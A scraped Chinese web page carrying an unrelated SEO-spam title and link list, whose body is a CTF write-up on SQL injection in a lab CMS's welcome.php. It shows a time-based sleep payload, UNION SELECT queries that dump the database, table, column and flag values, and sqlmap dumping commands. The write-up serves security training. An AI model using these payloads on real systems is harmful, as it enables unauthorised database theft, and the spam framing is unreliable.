当前位置: 首页 > news >正文

昆明网站建设方案托管sem竞价推广是什么意思

昆明网站建设方案托管,sem竞价推广是什么意思,好的公司网站有什么用,吉安高端网站建设公司靶标介绍: 该CMS的welcome.php中存在SQL注入攻击。 获取登录地址 http://eci-2zeb0096que0556y47vq.cloudeci1.ichunqiu.com:80 登录注册 注册成功登录进入注册接口 参数接口一 发现接口参数q http://eci-2zeb0096que0556y47vq.cloudeci1.ichunqiu.com/welcome.p…

靶标介绍:

该CMS的welcome.php中存在SQL注入攻击。

获取登录地址

http://eci-2zeb0096que0556y47vq.cloudeci1.ichunqiu.com:80

登录注册

注册成功登录进入注册接口

参数接口一
发现接口参数q http://eci-2zeb0096que0556y47vq.cloudeci1.ichunqiu.com/welcome.php?q=1

SQL盲注未发现利用点
http://eci-2zeb0096que0556y47vq.cloudeci1.ichunqiu.com/welcome.php?q=1' or '1'=1

继续下一步 查看接口和参数情况

参数接口二:

q step eid  n t等http://eci-2zeb0096que0556y47vq.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=60377db362694&n=1&t=34

注入点判断方式

参数后加'

参数后加'%2b(select*from(select(sleep(20)))a)%2b'

参数后加' union select 1,2,3,4,5--+

输入地址栏http://eci-2zeb0096que0556y47vq.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=60377db362694%27%20union%20select%201,2,3,4,5--+&n=1&t=34

查询数据库名

n=2' union select 1,2,database(),4,5--+

输入地址栏http://eci-2zeb0096que0556y47vq.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=60377db362694n=2%27%20union%20select%201,2,database(),4,5--+&n=1&t=34

查看表信息

2' union select 1,2,group_concat(table_name),4,5 from information_schema.tables where table_schema='ctf'--+

输入地址栏http://eci-2zeb0096que0556y47vq.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=60377db3626942%27%20union%20select%201,2,group_concat(table_name),4,5%20from%20information_schema.tables%20where%20table_schema=%27ctf%27--+&n=1&t=34

查询表字段信息

' union select 1,2,group_concat(column_name),4,5 from information_schema.columns where table_schema='ctf' and table_name='flag'--+

输入地址栏http://eci-2zeb0096que0556y47vq.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=60377db3626942%27%20union%20select%201,2,group_concat(column_name),4,5%20from%20information_schema.columns%20where%20table_schema=%27ctf%27%20and%20table_name=%27flag%27--+

 查看flag表中的字段

2' union select 1,2,group_concat(flag),4,5 from flag--+

发现接口参数 http://eci-2zeb0096que0556y47vq.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=60377db362694' union select 1,2,group_concat(flag),4,5

 flag{e5fb9a56-bfce-48cb-a816-77599da3b03a}

burusuite使用 

 burpsuite也是一款强大的漏扫工具,通过爬取接口进行扫描发现 接口是否存在安全隐患,具体使用教程就不说了,看个人习惯

 

sqlmap使用 

 暴库

保存txt文件执行

python sqlmap.py -l C:\Users\cheng\Desktop\1.txt --batch -dbs

爆破表 

python sqlmap.py -r D:/bc1.txt --batch -D "ctf" --tables

爆破表字段 

 python sqlmap.py -r D:/bc1.txt --batch -D "ctf" -T "flag" --columns

爆破具体字段信息

执行--batch -D "ctf" -T "flag" -C "flag" --dump

  flag{e5fb9a56-bfce-48cb-a816-77599da3b03a} 

SQL注入寻找接口,寻找参数, 寻找注入点, 进行sql盲注 ,查看响应结果值, 工具可以使用sqlmap bp进行测试验证 

http://www.hrbkazy.com/news/44547.html

相关文章:

  • wordpress微信支付插件下载seo实战视频
  • 肥城移动网站制作品牌营销策划方案怎么做
  • 重庆建设网站首页网络seo
  • 个人网页设计手绘广州seo排名优化
  • 网站icp备案证明最好看免费观看高清大全
  • 日本药妆电子商务网站建设规划书淄博seo推广
  • 比58同城做的好的网站百度客服电话4001056
  • 佛山网站建设灵格网络软文发布平台
  • 网站开发业务规划微信怎么推广引流客户
  • 网站推广资讯今日热搜前十名
  • 做园林景观的网站seo销售话术开场白
  • 呼和浩特可以做网站的公司磁力猫搜索引擎入口官网
  • 购物网站类型线上宣传推广方案
  • 免费房屋建设图纸网站有哪些北京网站排名seo
  • 有服务器有域名怎么做网站软文写手接单平台
  • 网站建设项目开发书交换链接名词解释
  • 怎么做各个地图网站的认证百度竞价推广常用到的工具
  • 国内所有免费b2b平台有哪些seo推广优化
  • 自己做网站卖东西可以免费发布信息的平台
  • 长沙网页推广价格公司优化seo网站
  • 做土地租赁买卖的网站有哪些企业seo顾问
  • 长沙营销型网站建设懂得网站推广
  • 文山网站建设代理爱站网关键词查询系统
  • 北京公司提供注册地址引擎seo优
  • wordpress调用主站的文章注册网站平台要多少钱
  • 国家开发银行助学贷款网站广东百度推广的代理商
  • 中国工程建设企业协会网站北京百度seo工作室
  • 莱芜哪家企业做网站生意参谋指数在线转换
  • 设计一个b2c网站上海seo推广外包
  • 北京网站建设兴田德润官网多少信息流优化师证书